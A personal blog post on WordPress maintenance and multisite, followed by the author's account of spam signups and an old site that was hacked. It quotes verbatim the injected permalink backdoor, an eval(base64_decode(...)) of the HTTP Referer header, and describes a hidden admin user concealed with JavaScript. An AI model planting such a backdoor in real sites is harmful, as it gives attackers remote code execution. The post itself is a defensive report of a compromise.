WordPress 3.0 Multisites is the indirect solution to so many security and maintenance problems.
I love the ability to rapidly create a beautiful website by installing WordPress and adding a theme. Create a few pages and WordPress handles all the navigation links. Want a contact page? Just add a plugin and you’ve got a contact for with CAPTCHA or whatever other protection you want.
However, creating a WordPress site — even a static one — requires regular maintenance: logging in and running upgrades to WordPress and to the plugins. If you don’t, eventually you’ll be bitten by some security hole. And when that happens — ick!
So what happens is:
You have one blog running WordPress. You log in regularly and maintain it. OK.
You add another site. Pretty! And another. And suddenly you’ve got THREE sites to log into and maintain.
And you build a quick blog site for a friend who doesn’t know computers. And a static site on a topic you have a few things you want to write about. And suddenly running maintenance and plugin upgrades becomes a full-time job.
And you want to do a few extra security upgrades? Lock down the log in page or make it stop giving out hints? Or any other brilliant touch for extra security? Suddenly, you have to do it FOR EVERY site you have running WordPress (especially those sites that are static which you would otherwise not have even looked at for another few months or years).
But now… WordPress 3.0 with MultiSites (Multi-sites? Multi sites? I have to check the spelling) TADA!
You can have ONE WordPress install that you maintain and upgrade and do all the wonderful security tricks you want and use that ONE install to run ALL your sites. Suddenly maintenance drops to JUST ONE central WordPress install to maintain. Having 50 domains on a variety of topics is a breeze!
Ah… but to get it to work. That I haven’t figured out yet. But I’m working on it.
UlricheDmond using the email address ulrichedmondsuses@gmail.com just created an acount on this blog.
Since (as the domain name might suggest) this is my blog (Eric Shefferman), there’s no need for anyone else to have an account here.
I googled the name and so far found
http://savelblogs.com/?p=1566
which lists this name/email as someone who tried to hack their blog (along with a list of other hacker usernames).
They seem to be a busy person/hacker/software robot – they also signed up here on September 7 2009
http://bbshowcase.org/forums/profile/ulrichedmond
and here on September 8, 2009:
http://www.nudjit.com/community/profile/ulrichedmond
And probably other places that just haven’t been indexed by google yet.
I deleted the user, but this is getting crazy. Static HTML websites are looking better and better.
- – -
Yup, an hour after I posted this, the same user/email registered on another blog of mine that is totally unrelated. This is pretty stupid since the only reason this is happening is as part of a WordPress security exploit. Someone thinks that by getting a user onto WordPress they can then elevate the user to admin level access and screw around. It’s not like I can stay up all night to try to delete these users as fast as some automated system can add them.
I still have no idea what this means.
I’m currently running WordPress 2.8.4 on this site.
One of my older sites was hacked as per
http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
and the permalinks were changed to
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
There was a hidden user named “WordPress” — javascript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the javascript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass javascript tricks.
Read the rest of this entry »
